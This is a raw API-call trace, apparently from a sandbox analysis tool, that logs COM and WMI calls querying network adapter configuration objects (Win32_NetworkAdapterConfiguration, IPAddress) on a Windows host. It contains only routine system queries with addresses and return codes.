	[0068.736] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d3c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.741] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.741] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.741] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.742] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.742] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.742] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.742] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.742] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.742] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.742] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.742] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__CLASS", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.742] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.742] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__CLASS", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.743] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.754] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.754] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.754] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.754] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.754] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.754] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.754] IWbemClassObject:GetNames (in: This=0x233e12e61f0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199c8e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199c8e0 | out: pNames=0x350199c8e0*="\x01ƀ\x08") returned 0x0
	[0068.754] SafeArrayGetDim (psa=0x233fc684aa0) returned 0x1
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__GENUS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__CLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.755] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.755] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__DYNASTY", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.755] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__RELPATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.755] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=0") returned 0x29
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.755] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__DERIVATION", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684a20*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc644c70, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x350199c8dc*=8200, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.756] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__SERVER", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.756] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.756] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.756] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.756] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__PATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.756] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x3f
	[0068.756] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c980 | out: puCount=0x350199c980*=0x2) returned 0x0
	[0068.756] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x0, pszText=0x0 | out: puBuffLength=0x350199c980*=0x17, pszText=0x0) returned 0x0
	[0068.756] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c980*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.756] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="IPADDREss", lFlags=0, pVal=0x350199c970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=0, plFlavor=0x350199c968*=0 | out: pVal=0x350199c970*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=8200, plFlavor=0x350199c968*=32) returned 0x0
	[0068.757] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="IPADDREss", lFlags=0, pVal=0x350199cba0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=32 | out: pVal=0x350199cba0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=32) returned 0x0
	[0068.757] CoTaskMemAlloc (cb=0x8) returned 0x233fc644c70
	[0068.757] IEnumWbemClassObject:Next (in: This=0x233fc6f4ed0, lTimeout=-1, uCount=0x1, apObjects=0x233fc644c70, puReturned=0x350199d478 | out: apObjects=0x233fc644c70*=0x233e12e5480, puReturned=0x350199d478*=0x1) returned 0x0
	[0068.758] IUnknown:QueryInterface (in: This=0x233e12e5480, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7a0 | out: ppvObject=0x350199c7a0*=0x233e12e5480) returned 0x0
	[0068.758] IUnknown:QueryInterface (in: This=0x233e12e5480, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c820 | out: ppvObject=0x350199c820*=0x0) returned 0x80004002
	[0068.758] IUnknown:QueryInterface (in: This=0x233e12e5480, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c5b8 | out: ppvObject=0x350199c5b8*=0x0) returned 0x80004002
	[0068.759] IUnknown:AddRef (This=0x233e12e5480) returned 0x3
	[0068.759] CoGetContextToken (in: pToken=0x350199c470 | out: pToken=0x350199c470) returned 0x0
	[0068.759] IUnknown:QueryInterface (in: This=0x233e12e5480, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c430 | out: ppvObject=0x350199c430*=0x233e12e5488) returned 0x0
	[0068.759] IMarshal:GetUnmarshalClass (in: This=0x233e12e5488, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c460 | out: pCid=0x350199c460) returned 0x0
	[0068.759] IUnknown:Release (This=0x233e12e5488) returned 0x3
	[0068.759] CoGetContextToken (in: pToken=0x350199c440 | out: pToken=0x350199c440) returned 0x0
	[0068.759] IUnknown:AddRef (This=0x233e12e5480) returned 0x4
	[0068.759] IUnknown:QueryInterface (in: This=0x233e12e5480, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c558 | out: ppvObject=0x350199c558*=0x0) returned 0x80004002
	[0068.759] IUnknown:Release (This=0x233e12e5480) returned 0x3
	[0068.759] IUnknown:Release (This=0x233e12e5480) returned 0x2
	[0068.760] CoGetContextToken (in: pToken=0x350199c900 | out: pToken=0x350199c900) returned 0x0
	[0068.760] CoGetContextToken (in: pToken=0x350199c840 | out: pToken=0x350199c840) returned 0x0
	[0068.760] IUnknown:AddRef (This=0x233e12e5480) returned 0x3
	[0068.760] IUnknown:QueryInterface (in: This=0x233e12e5480, riid=0x350199c980*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199c960 | out: ppvObject=0x350199c960*=0x233e12e5480) returned 0x0
	[0068.760] IUnknown:Release (This=0x233e12e5480) returned 0x3
	[0068.760] IUnknown:Release (This=0x233e12e5480) returned 0x2
	[0068.760] IUnknown:Release (This=0x233e12e5480) returned 0x1
	[0068.760] CoTaskMemFree (pv=0x233fc644c70) 
	[0068.760] CoGetContextToken (in: pToken=0x350199d280 | out: pToken=0x350199d280) returned 0x0
	[0068.760] IUnknown:AddRef (This=0x233e12e5480) returned 0x2
	[0068.760] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__GENUS", lFlags=0, pVal=0x350199d3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d3ec*=0, plFlavor=0x350199d3e8*=0 | out: pVal=0x350199d3f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199d3ec*=3, plFlavor=0x350199d3e8*=64) returned 0x0
	[0068.760] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PATH", lFlags=0, pVal=0x350199d390*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d38c*=0, plFlavor=0x350199d388*=0 | out: pVal=0x350199d390*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199d38c*=8, plFlavor=0x350199d388*=64) returned 0x0
	[0068.760] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0068.760] CoGetObjectContext (in: riid=0x350199d328*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d320 | out: ppv=0x350199d320*=0x233e121be30) returned 0x0
	[0068.761] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d340 | out: pAptType=0x350199d340*=1) returned 0x0
	[0068.761] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d448 | out: ppvObject=0x350199d448*=0x0) returned 0x80004002
	[0068.761] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.761] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c9b0 | out: ppv=0x350199c9b0*=0x233fc7044a0) returned 0x0
	[0068.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc7044a0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c6c0 | out: ppvObject=0x350199c6c0*=0x0) returned 0x80004002
	[0068.761] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc7044a0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c6a8 | out: ppvObject=0x350199c6a8*=0x233e3a01f10) returned 0x0
	[0068.761] IUnknown:QueryInterface (in: This=0x233e3a01f10, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c5b0 | out: ppvObject=0x350199c5b0*=0x233e3a01f10) returned 0x0
	[0068.762] IUnknown:QueryInterface (in: This=0x233e3a01f10, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c630 | out: ppvObject=0x350199c630*=0x0) returned 0x80004002
	[0068.762] IUnknown:AddRef (This=0x233e3a01f10) returned 0x3
	[0068.762] CoGetContextToken (in: pToken=0x350199c280 | out: pToken=0x350199c280) returned 0x0
	[0068.762] IUnknown:QueryInterface (in: This=0x233e3a01f10, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c240 | out: ppvObject=0x350199c240*=0x233fc703dc0) returned 0x0
	[0068.762] IMarshal:GetUnmarshalClass (in: This=0x233fc703dc0, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c270 | out: pCid=0x350199c270) returned 0x0
	[0068.762] IUnknown:Release (This=0x233fc703dc0) returned 0x3
	[0068.762] CoGetContextToken (in: pToken=0x350199c250 | out: pToken=0x350199c250) returned 0x0
	[0068.762] IUnknown:AddRef (This=0x233e3a01f10) returned 0x4
	[0068.762] IUnknown:QueryInterface (in: This=0x233e3a01f10, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c368 | out: ppvObject=0x350199c368*=0x0) returned 0x80004002
	[0068.762] IUnknown:Release (This=0x233e3a01f10) returned 0x3
	[0068.763] IUnknown:Release (This=0x233e3a01f10) returned 0x2
	[0068.763] WbemDefPath:IUnknown:Release (This=0x233fc7044a0) returned 0x0
	[0068.763] IUnknown:Release (This=0x233e3a01f10) returned 0x1
	[0068.763] CoGetContextToken (in: pToken=0x350199cf80 | out: pToken=0x350199cf80) returned 0x0
	[0068.763] CoGetContextToken (in: pToken=0x350199cec0 | out: pToken=0x350199cec0) returned 0x0
	[0068.763] IUnknown:AddRef (This=0x233e3a01f10) returned 0x2
	[0068.763] IUnknown:QueryInterface (in: This=0x233e3a01f10, riid=0x350199d000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cfe0 | out: ppvObject=0x350199cfe0*=0x233e3a01f10) returned 0x0
	[0068.763] IUnknown:Release (This=0x233e3a01f10) returned 0x2
	[0068.763] IUnknown:Release (This=0x233e3a01f10) returned 0x1
	[0068.763] CoGetContextToken (in: pToken=0x350199d100 | out: pToken=0x350199d100) returned 0x0
	[0068.763] CoGetContextToken (in: pToken=0x350199d040 | out: pToken=0x350199d040) returned 0x0
	[0068.763] IUnknown:AddRef (This=0x233e3a01f10) returned 0x2
	[0068.763] IUnknown:QueryInterface (in: This=0x233e3a01f10, riid=0x350199d180*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199d160 | out: ppvObject=0x350199d160*=0x233e3a01f10) returned 0x0
	[0068.763] IUnknown:Release (This=0x233e3a01f10) returned 0x2
	[0068.764] IUnknown:AddRef (This=0x233e3a01f10) returned 0x3
	[0068.764] IWbemPath:SetText (This=0x233e3a01f10, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x0
	[0068.764] IUnknown:Release (This=0x233e3a01f10) returned 0x2
	[0068.764] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d3c0 | out: puCount=0x350199d3c0*=0x2) returned 0x0
	[0068.764] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d3c0*=0x17, pszText=0x0) returned 0x0
	[0068.764] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d3c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.764] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.764] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.764] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.764] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.764] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.764] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.764] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.764] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.764] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.764] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.764] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__CLASS", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.764] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.764] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__CLASS", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
